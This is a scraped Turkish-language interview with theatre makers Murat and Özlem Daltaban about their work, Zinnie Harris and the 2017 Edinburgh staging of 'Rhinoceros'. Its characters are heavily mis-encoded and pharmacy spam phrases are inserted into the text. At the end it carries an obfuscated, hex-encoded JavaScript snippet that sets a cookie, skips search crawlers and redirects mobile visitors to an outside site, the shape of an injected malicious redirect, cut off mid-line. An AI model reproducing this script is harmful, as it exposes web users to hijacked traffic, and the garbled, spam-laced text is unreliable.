Ve en nihayetinde oyunlardaki mA?zikai??i?? Provalarda bazen gAi??zlerinizi kapatAi??p, sadece sahnenin sesini dinleyip oyunu bAi??yle anlamaya Ai??alAi??AYAi??yorsunuz.
Murat Daltaban: Sesi Ai??ok Ai??nemsiyorum. Tiyatro aslAi??nda iki dilin birleAYimi: Hem gAi??rsel, hem iAYitsel. SonuAi??ta oyuncu hikayeyi anlatAi??rken sesini kullanAi??yor ama mA?zik sesin zenginliAYini, perspektifini ve iAYin dramatik yapAi??sAi??nAi?? zenginleAYtirir. Onun iAi??in oyun yaparken, ses tasarAi??mAi??nAi?? ve mA?ziAYin kullanAi??mAi??nAi??, iAYin yoAYun ve Ai??nemli Ai??bir parAi??asAi?? olarak dA?AYA?nA?rA?m. Bir oyun Ai??alAi??AYAi??rken mA?zikle birlikte Ai??alAi??AYAi??rAi??m. Kafamda Ai??nce iAYin mA?ziAYini bulur, sonra sahnelerle iliAYkisini kurarAi??m. Bu aAYamadan sonra Ai??ok hAi??zlAi?? ilerlerim. MA?zik benim iAi??in Ai??ok ilham verici bir kaynak.

Ai??yi bir yAi??netmenin ai???fena deAYilai??? diye yorumlanacak bir iAY Ai??Ai??karacaAYAi?? Ai??ykA?yA?, soluk soluAYa izlenecek bir gAi??rsel AYAi??lene dAi??nA?AYtA?rmek ve bir tiyatro olayAi??na Ai??evirmek iAi??in Murat DaltabanAi?? adlAi?? sahne bA?yA?cA?sA? olmak gerek. Samimi olarak, ai???Beautiful Burnoutai??? sahnelemesinin tiyatro okullarAi??nda ders olarak okutulacak nitelikte olduAYu kanAi??sAi??ndayAi??mai??? demiAY Robert Schield yanAi??lmAi??yorsam. ai???Beautiful Burnout ai??i?? Supernovaai??? uzun prova dAi??neminden sonra Ai??Ai??kan ai???devised theatreai??? denilen farklAi?? bir Ai??alAi??AYmaydAi??. Bu oyunda mA?zik kullanAi??mAi??na bir Ai??rnek.
Murat Daltaban: Oyunu A?Ai?? ayda Ai??Ai??kardAi??k ama ilk bir buAi??uk yAi??lAi??, oyuncularAi??n bedensel kondisyon ve dans hazAi??rlAi??klarAi?? iAi??in kullandAi??k. Oyun gerAi??ekten kondisyona ihtiyaAi?? duyuyordu. Oyunda gerAi??ekten bir oyuncu baAYarAi??sAi??, oyuncu performans baAYarAi??sAi?? vardAi??r ve mA?zikler, besteler de muhteAYemdir. ai???SA?pernovaai??? zorlu bir oyundur . O yA?zden belki de A?zerine konuAYulup incelenebilecek, nasAi??l yapAi??ldAi??AYAi?? A?zerine sohbet edilebilecek bir oyundur. Oyunu ilk seyredip, geldiAYimizde ve ekibe bahsettiAYimizde yapAi??lamaz bir oyun demiAYtim. Bizim Ai??ocuklar ai???yapalAi??mai??i?? diye Ai??srar etti. ai???Azu an sizinle yapamam, eAYer oynamak istiyorsanAi??z, bedenlerinizi hazAi??rlayAi??n, siz ne zaman hazAi??r olursanAi??z o zaman yaparAi??m oyunuai??? dedim. O oyunda iAY oyuncularda bitiyordu. Bir buAi??uk sene Ai??ok Ai??alAi??AYtAi??lar, direndiler. SA?reAi?? iAi??inde bazAi?? oyuncular kadrodan dA?AYtA?, yerine baAYkalarAi?? geldi. Ai??ok Ai??alAi??AYtAi??lar, boksAi??r oldular, neredeyse ringe Ai??Ai??kabilecek vaziyette boks Ai??AYrendiler sonunda.


ai???Festenai??? den sonra sanAi??rAi??m KAi??ksal EngA?r ile bu sezon baAYlayan ai???Nefesinizi NasAi??l TutarsAi??nAi??zai???da tekrar birlikte oynuyorsunuz. Oyunun yazarAi?? ai???bA?yA?lA? gerAi??ekliAYinai??? sesi olan Zinnie Harris, aradaba giderken Danteai??i??nin ai???Ai??lahi Komedyaai???sAi??nAi?? dinliyor ve gerAi??ek ve spiritA?el arasAi??ndaki baAYAi?? kA?tA?phaneciyi bularak kuruyor. Yine
Jasminai??i??in hamileliAYini kendi hamileliAYinden esinlenerek yazAi??yor. Bu oyunu sizin yAi??netmenizi Ai??ok istiyor. Siz de hem yAi??netiyor, hem dekor tasarAi??mAi??nAi?? yapAi??yor, hem de AYeytan rolA?nA? oynuyorsunuz. Oradaki oyun Edinburghai??i??da eleAYtirmenler tarafAi??ndan sevilmese de Royal Courtai??i??ta en Ai??ok izlenen oyun olmuAY. Buradaki reji sevildi mi?
Murat Daltaban: Burada eleAYtirmenler de, seyirci de Ai??ok sevdi. Oradaki seyircinin enteresan bir yaklaAYAi??mAi?? vardAi??.
Ai??zlem Daltaban: Oyunu, Londraai??i??da Royal Courtai??i??ta, tiyatronun Sanat YAi??netmeni olan Vicky Featherstone sahneledi. Zinnie, Londraai??i??da oyunu AYiddetle sevenler ve AYiddetle sevmeyenler oldu diye anlatmAi??AYtAi??.

Dotkanyonda Zinnie Harrisai??i??in diAYer oyunu ai???KAi??AY DAi??nA?mA?ai??? ile aAi??Ai??lmAi??AYtAi??. ai???Onun kendi endiAYelerinden kazAi??yAi??p Ai??Ai??kardAi??AYAi?? hikayelerinin A?stA?nA?, biz, bize bir AYey olmaz rahatlAi??AYAi??yla kapatAi??yoruzai??? diye bahsetmiAYti Murat Daltaban. Ai??lk kez Royal Shakespeare Company tarafAi??ndan sahnelenen oyunu onun rejisiyle izleyince olaAYanA?stA? bulmuAY Zinnie Harris.
Ai??zlem Daltaban: ai???KAi??AY DAi??nA?mA?ai??? Ai??ok Ai??nemli ve Ai??ok Ai??zel bir oyundu. Hem metnin anlattAi??AYAi?? hikaye aAi??Ai??sAi??ndan, hem de Muratai??i??Ai??n yAi??netmenlik dilinin vardAi??AYAi?? son nokta aAi??Ai??sAi??ndanai??i?? Murat pek anlatmayAi?? sevmiyor ama ben AYAi??yle tarif edebilirim, bence aslAi??nda yAi??netmen, dilini, bakAi??AYAi??nAi?? ve sanatsal gAi??rA?AYA?nA? kendine uygun bulduAYu yazarAi?? arAi??yor. Bence Murat, Zinnie Harris ile ai???o bA?yA?lA? gerAi??eklikai??? dediAYi noktada buluAYtu. O, onun yazarAi??, o da, onun yAi??netmeni. Muratai??i??Ai??nAi?? iAi??inde gezinmekten hoAYlandAi??AYAi?? ai???bir yerden baAYlayan ve akAi??AYta bambaAYka bir yere giden gerAi??eklikten uzaklaAYmayAi??ai??? Zinnieai??i??nin metinlerinde bulmasAi?? ikisi iAi??in de Ai??ok gA?zel bir karAYAi??laAYma oldu. Murat, Zinnieai??i??yi de AYaAYAi??rtan, gA?Ai??lA? bir imza atAi??nca rejiye, -tabii ki Zinnieai??i??nin metinlerinde bu malzeme zaten var ama o metinleri her yAi??netmen bAi??yle sahnelemiyor-Ai?? aralarAi??nda Ai??ok iyi bir uyum oldu. ai???KAi??AY DAi??nA?mA?ai??? ve ai???NefesiniziAi?? NasAi??l TutarsAi??nAi??z?ai??? oyunlarAi??nAi??n ardAi??ndan ai???Gergedanlarai??? uyarlamasAi?? ile A?Ai??A?ncA? kez bir araya gelmiAY olacaklar.

Evet Ai??ncesinde Edinburgh Fringe Festivaliai??i??nde ai???Ai??ki KiAYilik Yazai??? ve ai???SarAi?? Ayai???Ai??n yAi??netmeni David Greigai??i??le birlikte, ai???KAi??AY DAi??nA?mA?ai??? ve ai???Nefesinizi NasAi??l TutarsAi??nAi??zai??? oyunlarAi??nAi??n yazarAi?? olan Zinnie Harris ile bir araya gelmiAYtiniz.
Ai??zlem Daltaban: KorkarAi??m Murat sonsuza kadar Zinnieai??i??yle Ai??alAi??AYacak. Zinnieai??i??nin bir ai???Restless Houseai??? A?Ai??lemesi var, muazzam bir uyarlama. Azimdi o A?Ai??lemeyi yapmak istiyor. Eminim Murat sahnelediAYinde metne bambaAYka bir fikirle yaklaAYacakai??i?? Dotai??i??un aAi??Ai??lAi??AYAi??ndan beri severek sahnelediAYi birAi??ok oyun oldu. O metinlere de hep Ai??ok farklAi?? yorumlar getirdi Murat. Mesela ai???KA?rklA? MerkA?rai???A? kaAi?? kiAYi Ai??yle sahnelemiAYtir? ai???KA?rklA? MerkA?rai??i??A?n yazarAi?? Philip Ridleyai??i??i Ai??stanbulai??i??da misafir etmiAYtik, oyununu seyrettiAYinde Ai??ok etkilenmiAYtiai??i??

O da kA?lt olmuAY bir oyun tarihte. Tekrar oynansAi??n diyeni Ai??ok.
Ai??zlem Daltaban: Oynanabilir ama tabii aynAi?? oyuncularla olamaz. Sahnede izleyeceAYimiz oyuncularAi??n Ai??ok genAi?? yaAYta olup bu baskAi??yAi??, bu korkunAi??luAYu yaAYAi??yor olmalarAi?? Ai??ok iAi?? acAi??tAi??cAi?? bir durumdu. HA?lA? Ai??ok Ai??arpAi??cAi??, hA?lA? bugA?nA?n mevzusu, gA?ndem her yerde hep aynAi??ai??i??

Micardis cost canada Ekip olmak Ai??nemli. Oyuncu, Ai??evirmen, yAi??netmen, yazar olarak deAYerlendirdiAYiniz kiAYiler var ekipte. Hakan GA?ndayai??i??Ai??n ai???Malafaai???sAi??nAi?? 17. Ai??stanbul Tiyatro Festivaliai??i??ne hazAi??rlamAi??AYtAi??nAi??z. Ve o dAi??nem yazarAi??nAi??zAi?? bulmuAYtunuz. Yerli oyunlar sorusuna da cevaptAi?? bu.
Ai??zlem Daltaban: Murat yeni oyun metnini Ai??nemseyen, Ai??ok kAi??ymetli bulan bir Genel Sanat YAi??netmeniai??i??dir. Ai??ok titiz ve mA?kemmelliyetAi??i olduAYu iAi??in, oyun metni en olgun noktaya gelene kadar yazAi??m sA?recinin devam etmesi gerektiAYine inanAi??r. DolayAi??sAi??yla bu uzun yazAi??m sA?recini yazarAi??yla dirsek dirseAYe yaAYayabileceAYi bir yapAi??mAi??z oluAYamadAi?? henA?z. Hakanai??i??la ai???Malafaai??? romanAi??nAi?? oyunlaAYtAi??rdAi??klarAi?? sA?reAi??te, Hakan defalarca yazdAi??, A?zerinden geAi??ti. Zor bir sA?reAi?? buai??i?? EAYer oyun yazma tekniAYine en hakim A?lke, yA?zlerce farklAi?? yazarlAi??k atAi??lyeleriyle meAYhur Shekaspeareai??i??in BA?yA?k Britanyaai??i??sAi??dAi??r diye dA?AYA?nA?rsek, inanAi??n orada oyun yazarlAi??AYAi?? bir meslek, bir profesyonellik alanAi??. Mesala Zinnie Harris gA?Ai??lA? bir oyun yazarAi?? ve hocasAi??. Ai??stanbulai??i??da yapAi??lan Royal Court oyun yazAi??m atAi??lyesi iAi??in Mark Ravenhill ile birlikte eAYitmen olarak gelmiAYti. HatAi??rlarsAi??n geAi??miAY yAi??llarda British Council desteAYi ile DOTai??i??ta paneller yapmAi??AYtAi??k. ai???Ai??ngiliz Yazarlar Dotai??i??ta KonuAYuyorai??? serisi. Panellerde, Phillip Ridley, Mark Ravenhill, Simon Stephens yazarlAi??k tecrA?belerini anlattAi??lar, en Ai??ok aklAi??mda kalan; oyunlarAi?? defalarca yazdAi??klarAi??nAi?? anlatmalarAi??ydAi??ai??i?? Oyun metni yazAi??m tekniAYini Ai??ok iyi biliyorlar. Biz yeni yazar ve yeni metin destekleyen bir tiyatro olmayAi?? Ai??ok arzu ediyoruz ama bunun iAi??in mutlaka Ai??zel bir fon olmasAi?? gerekir. KeAYke devletin bunun iAi??in bir Ai??deneAYi olsa. Biz baAYAi??msAi??z ve Ai??zel bir tiyatro olarak, Ai??aAYdaAY, yenilikAi??i metinleri, iyi reji ve iyi oyunculukla sahneleme misyonumuza devam ediyoruz. Yeni metin destekleyen tiyatro olmak ise bambaAYka bir pozisyon. Ai??ok baAYka bir bA?tAi??e ve Ai??ok baAYka bir destek anlayAi??AYAi?? gerektirir.

1973 doAYumlu yazar Zinnie Harris ile yakAi??nlAi??AYAi??nAi??zAi??n mesleki sAi??nAi??rlarAi??n dAi??AYAi??nda olduAYunu, Ai??ok iyi arkadaAY olduAYunuzu, gittiAYinizde evinde kaldAi??AYAi??nAi??zAi?? biliyorum.
Purchase rosuvastatin online Ai??zlem Daltaban: Zinnie ile Ai??ok yakAi??nAi??z, dA?nya gAi??rA?AYlerimiz birbirine benziyor, artAi??k gAi??z temasAi??yla anlaAYAi??yoruz diyebilirim ve Ai??zellikle tiyatro konusunda Muratai??i??la Ai??ok iyi anlaAYAi??yorlar. Evet, geAi??en yaz festival zamanAi?? onun evinde kaldAi??k. Bu kadar hayranlAi??k duyduAYun ve zaman iAi??inde yakAi??n arkadaAY olduAYun birinin kendi dA?zeninde yaAYamak entresandAi??, keyifliydi. Zinnie, iAYinde mA?thiAY profesyonel biri, arkadaAYlAi??AYAi??nda Ai??ok verici, Ai??ok yapAi??cAi??. BA?yA?k Britanyaai??i??nAi??n tiyatro dA?nyasAi??nda gittikAi??e yA?kselen bir deAYer, bunu yAi??llar iAi??inde kendimiz de gAi??zlemledik. EIFai??i??in artistik direktAi??rA? Fergus Linehan, International Edinburgh Festivalai??i??in 2017 programAi??nAi?? aAi??Ai??klarken ai???bu yAi??l Zinnie Harrisai??? yAi??lAi?? dedi. Ai??A?nkA? ana festival kapsamAi??nda Traverse Theatreai??i??da ai???Meet Me At Dawnai??? isimli yeni oyunu, tiyatronun sanat yAi??netmeni Orla Oai??i??Loughlin tarafAi??ndan sahneleniyor. AslAi??nda Traverse Theatre ana festival mekA?nAi?? deAYildir, Fringe programAi??nda kendi seAi??kisiyle yer alAi??r. Bu yAi??l Traverseai??i??deki bir oyun ana festival programAi??nda yer alAi??yor. Zinnieai??i??nin EIFai??i??deki ikinci oyunu ai???This Restless Houseai???- ai??? Oresteia A?Ai??lemesiai???. Bu bir A?Ai??leme ve geAi??en kAi??AY Dominic Hill tarafAi??ndan Citiziens Theatre Glasgowai??i??da sahnelendi, bu yaz 2017 EIFai??i??deler. Ve son olarak bizim oyunumuz ai???Gergedanlar ai??i?? Rhinocerosai???. Oyunu Zinnie yeniden yorumladAi??. DolayAi??sAi??yla EIF kapsamAi??nda Zinnieai??i??nin beAY oyunu var. Ai??nanAi??n bu Ai??ok zor ve Ai??ok nadir olabilecek bir durum.

Bu sene Edinburgh Ana Festivaliai??i??ne davet A?zerine katAi??lAi??yorsunuz. Bu Ai??ok heyecan veriyor. Festival tarihinde ilk kez bir TA?rk yAi??netmen oyun sahneleyecek. Murat Daltaban yAi??netmen, Ece Dizdar ve Esin Alpogan oyuncu, OAYuz KaplangAi?? mA?zisyen ve Serkan SalihoAYlu ile AyAYegA?l BeyazdaAY da asistan olarak gidiyor. Teklif Lyceum Theatreai??i??Ai??n Sanat YAi??netmeni David Greig,ai??i??ten geliyor. Ionescoai??i??nun ai???Gergedanlarai???Ai?? Festivalai??i??de DOT, Lyceum Theatre ve Edinburgh International Festival ortak yapAi??mAi?? olarak, BritanyalAi?? ve TA?rk oyuncular tarafAi??ndan oynanacak. Oyun 5 AAYustosai??i??ta prAi??miyer yapacak. Dekor tasarAi??mAi?? ise Royal Shakespeare Company ve National Theatreai??i??Ai??n tasarAi??mlarAi??nAi?? da yapan Tom Piperai??i??a ait.
Murat Daltaban: AslAi??nda fikir Zinnieai??i??yle David Greig sohbet ederken ortaya Ai??Ai??kAi??yor. Sonra, Zinnie ve Davidai??i??le biz bir sohbet gerAi??ekleAYtirdik. David, Lyceumai??i??da ai???Gergedanlarai???Ai?? yapabilirsin, ne dersin, bunun A?zerine dA?AYA?nelim dedi. Sonra uzun konuAYmalarAi??nda ardAi??ndan fikir geliAYti, dAi??nA?AYtA?. Sadece bir oyun sahnelemek deAYil de; Ai??skoAi??yaai??i??yla TA?rkiye arasAi??nda kAi??prA? proje gibi dA?AYA?nsek dedik. Biz dAi??ndA?k ama gAi??rA?AYmelerimiz devam etti, onlardan fikirler gelmeye baAYladAi??, yazAi??AYmalar oldu. KarAYAi??lAi??klAi?? heyecan gittikAi??e arttAi??. David, EIFai??i??in sanat yAi??netmeni Fergus Linehan konuAYmuAY projeyi, EIF ekibi de Ai??ok heyecanlanmAi??AY. SonuAi??ta EIF ortaklAi??AYAi??yla 2017 ana festival programAi??nda yer aldAi?? projemiz. AslAi??nda Ai??ok kAi??sa bir sA?re iAi??erisinde Ai??ok hAi??zla geliAYti olaylar. Festival kararAi?? alAi??ndAi??ktan sonra bizim proje iAi??in Edinburghai??i??a gitmelerimiz baAYladAi??. Ai??nce proje kararlarAi?? ve Lyceum ekibiyle tanAi??AYmak A?zere gittik. Sonra oyuncu seAi??imleri iAi??in gittik, o gidiAYimizde 15 Marttai??i??ta EIF dA?nyaya programAi??nAi?? aAi??Ai??kladAi??, aAi??Ai??lAi??AY davetine biz de katAi??ldAi??k. Bu arada tasarAi??mcAi??mAi??z Tom ile buluAYmak iAi??in Londraai??i??ya gidiyorduk. Ai??ok yoAYun bir programla ilerledik.
Ai??zlem Daltaban: Oyuncu seAi??imi iAi??in gittiAYimizde Ai??ok kAi??ymetli oyuncular katAi??ldAi?? seAi??melere. Lyceumai??i??un Ai??alAi??AYtAi??AYAi?? Cast DirektAi??rA? olan Laura hazAi??rlamAi??AYtAi?? oyunun seAi??melerini. GeAi??miAY yAi??llarda festivalde veya Fringeai??i??de sahnede izlediAYim bazAi?? kAi??ymetli oyuncularla tanAi??AYmak, onlarAi?? seAi??melerde izlemek Ai??ok keyifliydi. Azimdi artAi??k, 22 Haziranai??i??da provalar iAi??in gidiyoruz, altAi?? hafta provanAi??n ardAi??ndan, oyun prAi??miyer yapacak. 3 ve 4 AAYustosai??i??ta iki Ai??n gAi??sterim (prewiew) ile baAYlAi??yoruz, 5 AAYustosai??i??ta prAi??miyer yapAi??yoruz. HeyecanlAi?? bir yolculuk bizi bekliyorai??i?? 3-12 AAYustos arasAi?? on iki gAi??sterimiz var, tiyatro ve tiyatro festivali meraklAi??larAi??nAi?? Edinburghai??i??a bekleriz.

Ve oyun Lyceum Theatreai??i??Ai??n kAi??AY programAi??na alAi??nacak.
Ai??zlem Daltaban: Evet, Lyceum 2017-18 sezonunu birkaAi?? hafta Ai??nce aAi??Ai??kladAi??. KAi??AY programAi??nda ai???Gergedanlarai??? da yer alAi??yor. Mart/Nisan aylarAi??nda iki hafta prova, iki hafta oyun iAi??in oradayAi??z. KAi??AY programAi??nda oyun Lyceumai??i??un kendi seyircisi ile buluAYacak, orasAi?? da ayrAi?? heyecanlAi?? geliyor bana.

Edinburgh Festivali 2. DA?nya savaAYAi??nAi??n bitiminden beri yetmiAY yAi??ldAi??r yapAi??lAi??yor. Ionesco da ai???Gergedanai???larAi?? 1956ai??i??da yazmAi??AY, 1959ai??i??da oynanmAi??AY. Ai??kinci DA?nya SavaAYAi?? sonrasAi??nda faAYizmin halk A?zerindeki dinamikleri A?zerine giderek kimliksizleAYmeyi anlatan gA?ncel bir hikayenin seAi??ilmesi rastlantAi?? mAi???
Murat Daltaban: 2. DA?nya SavaAYAi?? sonrasAi??nda dAi??nA?p baktAi??AYAi?? zaman Ionesco, AYiddetli bir faAYizmin arkasAi??ndan yA?rA?yen o AYiddetli kitleyi incelemeye alAi??p bAi??yle bir oyun yazmAi??AY. BugA?n durum aynAi??. SaAY politikalarAi??n, totaliter politikalarAi??n ve faAYizmin yA?kseliAYe geAi??tiAYi dAi??nemlerde, bu nasAi??l destek buluyor, bu kadar insan tecrA?besinden sonra nasAi??l, niye destek buluyor diye geri dAi??nA?p baktAi??AYAi??nAi??zda yine ai???Gergedanlarai???Ai?? getirip ortaya koyuyorsunuz. FaAYist kitlelerin nasAi??l hareket ettiAYinin anatomisini orada inceliyorsunuz. Ai??skoAi??ya Avrupaai??i??nAi??n en batAi??sAi??, TA?rkiye en doAYusu. Bu iki A?lke arasAi??ndaki kAi??prA?yA? tematik olarak da kuracak gA?Ai??te bir hikaye. Bu sene oynanmasAi?? fikri o yA?zden Ai??ok hAi??zlAi?? kabul edildi. UluslararasAi?? Edinburgh Festivali de, Lyceum da, biz de, oyunu AAYustos 2017ai??i??deki Festivalai??i??e yapmayAi??, yetiAYtirmeyi istedik. Ai??A?nkA? Trumpai??i??Ai??n seAi??ilmesi, Avrupaai??i??da Le Penai??i??in yA?kselmesi, Ai??ngiltereai??i??de Farageai??i??Ai??n sAi??ylemleri, Avursturya, Ai??talya… Her yerde saAY, faAYist hareketler, DoAYuai??i??dan gelen mA?lteci hareketiyle de yA?kseldi. Radikal saAY hareketler bu gAi??Ai??A? kendi iktidarlarAi?? iAi??in, kendi halklarAi??na karAYAi?? silah olarak kullanAi??yor. TA?m bunlar faAYizmin yA?kselmesine sebep oluyor. Ai??A?nkA? halklar da kendi topraklarAi??nda, kendi haklarAi??nAi?? korumak istiyor. Bizdeki ayrAi?? bir delilik zaten. Bizdeki faAYist totaliter yA?kseliAY ayrAi?? bir tarih. Ai??ngiltereai??i??deki, Almanyaai??i??daki ya da Fransaai??i??daki faAYist bir hareket buradaki faAYist hareketi besliyor. Buradan Ai??Ai??kan bir radikal saAY sAi??ylem, oradaki radikal saAYAi?? besliyor. TA?rkiye ve Hollanda arasAi??nda olan bu son Ai??ekiAYmede olduAYu gibi. Oradaki saAYcAi??larAi??n, buradaki ataktan faydalanAi??p oy devAYirmeye Ai??alAi??AYmasAi?? gibi. Bizimkilerin oy devAYirmeye Ai??alAi??AYmasAi?? gibi. Hepsi birbirini besleyen bir dinamik oluAYturuyor.

ai???Nefesinizi NasAi??l TutarsAi??nAi??zai???da yaAYadAi??AYAi??mAi??z travmalarAi?? konuAYma ihtiyacAi?? duyuyoruz. BatAi??ai??i??da da iAYler tAi??kAi??r tAi??kAi??r iAYlemiyor. OrasAi?? da A?topik bir coAYrafya deAYil. ai???Biz medeni bir A?lke insanAi??yAi??z. Biz AvrupalAi??yAi??z. Hayatta gAi??rebileceAYimiz en bA?yA?k kaos iAYte buai??? demek bA?yA?k yanAi??lgAi??.
Murat Daltaban: Ai??nsanlar kendi yaAYamlarAi??nAi??n tehdit altAi??nda olduAYunu hissetmekten hoAYlanmAi??yorlar, gA?venlik istiyorlar. GA?venlik dediAYimiz noktada, bu sefer Ai??zgA?rlA?kler kAi??sAi??lmaya baAYlanAi??yor. Ai??zgA?rlA?AYA? kAi??smaya baAYladAi??AYAi??mAi??zda bu sefer korku artAi??yor. Korku arttAi??kAi??a korkuyu yAi??neten, halkAi?? yAi??netmeye baAYlAi??yor. Birbirine zincirleme bir reaksiyon oluAYuyor. DAi??ngA? bu. Aziddet korkuyu getiriyor, korku faAYizme dAi??nA?AYA?yor, faAYizm tekrar AYiddete dAi??nA?AYA?yor. Bunun iAi??inden Ai??Ai??kmanAi??n tek yolu aslAi??nda, evrensel insan haklarAi??na uymak. Bizi belirleyecek olan tek yazAi??lAi?? metin ve en doAYru, en reddedilemez metin insan haklarAi?? evrensel bildirisidir. O bildiri A?zerinden deAYerlendirmediAYin takdirde hayatAi??, adalete ulaAYmak mA?mkA?n deAYil.

Hele de yA?zeysel kAi??lavuzluklarla hiAi?? deAYil! ai???How toai??i??ai??? ile baAYlayan kitaplarla Ai??yle hap gibi bilgilerle hapAi?? yutarAi??z sadece.
Murat Daltaban: GA?ndelik hayatAi??nAi??zAi?? sA?rdA?rebilirsiniz o nasAi??l yapAi??lAi??r kitaplarAi??yla ama orta-uzun vadede insanlAi??AYAi??n ya da kendi geleceAYimizin faydasAi??na bir durum deAYil.

Dot bu sezon 7 serisinde oynanan ai???Ai??yi Azeyler Olacak Diye DA?AYA?nai???, Ai??ai???Limon Limon Limon Limon Limonai???, okuma tiyatrosu olan Ai??ai???GA?neAYte YA?rA?mekai???, ai???Nefesinizi NasAi??l TutarsAi??nAi??zai???, ai???Bunu Ben de YaparAi??mai???, ai???Ai??ki KiAYilik Yazai??? ile repertuvar tiyatrosu olarak seAi??enek sunuyor. Bu Ai??ok iyi Ai??A?nkA? bir sezon bir oyun izleyip beklemek istemiyor seyirci. Dotai??i??un toplam oyun sayAi??sAi?? kaAi?? oldu? otuzu geAi??miAYtir.
Ai??zlem Daltaban: Azu an tam emin olamadAi??m ama otuz bir oldu galiba. AyrAi??ca DotBilsarda-Vur/ YaAYmala/Yeniden projesinde on sekiz kAi??sa oyun vardAi??. Makas OyunlarAi?? 1 ve 2ai??i??de yedi kAi??sa oyun vardAi??ai??i?? Ben yAi??netim tarafAi??ndaki kiAYi olarak AYAi??yle sAi??yleyeyim, tA?m bu prodA?ksiyonlarAi?? yapmak kolay deAYildiai??i??Ai?? Bunu, sAi??ylediAYin sAi??z dA?nyayAi?? ve insanlarAi?? etkilesin, deAYiAYtirsin umuduyla yapAi??yorsun baAYka hiAi??bir aAi??Ai??klamasAi?? yok. OluAYturduAYumuz sanatsal gA?Ai?? ile sevilen bir marka, kAi??ymet verilen bir deAYer haline geldiysek, buradaki en Ai??nemli AYeyin fikir ve estetik konularAi??nda hiAi??bir AYekilde Ai??dA?n vermememiz olduAYuna inanAi??yoruz.Ai?? DoAYru ve gA?ncel bulduAYumuz yaklaAYAi??mAi??mAi??zdan hiAi?? uzaklaAYmadAi??k.Ve bir de sA?reklilik Ai??ok Ai??nemli elbette. BA?yA?k bir AYehirde yaAYAi??yoruz. Ayda A?Ai?? gA?n gAi??steri yaptAi??AYAi??nAi??zda seyircinin sizi yakalamasAi?? Ai??ok zor. Oyun sayAi??sAi??nAi?? arttAi??rmak, gA?nleri ve mekA?nAi?? sabitlemek Ai??nemlidir. Bu durumda ben sanki mekan sahibi olmayAi?? Ai??neriyor gibi oluyorum ama mekA?n sahibi olmanAi??n getirdiAYi bA?yA?k zorluklar var biliyorsunuz, zor kararlar bunlar. On iki senede bu kadar oyun yapmanAi??n benim iAi??in en tatlAi?? karAYAi??lAi??AYAi??, seyircinin gAi??zA?ndeki o Ai??AYAi??AYAi??n hiAi?? kaybolmadAi??AYAi??nAi?? gAi??rmek. En baAYta konuAYtuAYumuzu tekrarlayacaAYAi??m: Daha metni ilk okuduAYumuzda, bizim gAi??zA?mA?zde Ai??AYAi??k yanmAi??yorsa, bizi heyecanlandAi??rmAi??yorsa; biz o oyunu yapmAi??yoruz. Biz etkilenmiyorsak olmaz yani. Kendimizi kandAi??rmamaya Ai??zen gAi??stererek bugA?nlere geldik.

Ai??nA?mA?z yaz ama sizin temponuz hiAi?? dA?AYmeyecek. AAYustos ayAi??nAi??n belli gA?nlerinde hep aklAi??ma geleceksiniz. Tekrar tebrik ve teAYekkA?r ederim.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 